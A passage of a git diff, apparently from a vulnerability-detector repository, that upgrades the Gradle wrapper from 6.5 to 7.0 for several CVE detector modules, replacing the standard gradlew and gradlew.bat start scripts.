a/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20175638/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20175638/gradlew b/google/detectors/rce/cve20175638/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20175638/gradlew +++ b/google/detectors/rce/cve20175638/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20175638/gradlew.bat b/google/detectors/rce/cve20175638/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20175638/gradlew.bat +++ b/google/detectors/rce/cve20175638/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20179805/gradle/wrapper/gradle-wrapper.properties @@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20179805/gradlew b/google/detectors/rce/cve20179805/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20179805/gradlew +++ b/google/detectors/rce/cve20179805/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. @@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar @@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME @@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. +# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20179805/gradlew.bat b/google/detectors/rce/cve20179805/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20179805/gradlew.bat +++ b/google/detectors/rce/cve20179805/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve201811776/gradle/wrapper/gradle-wrapper.properties 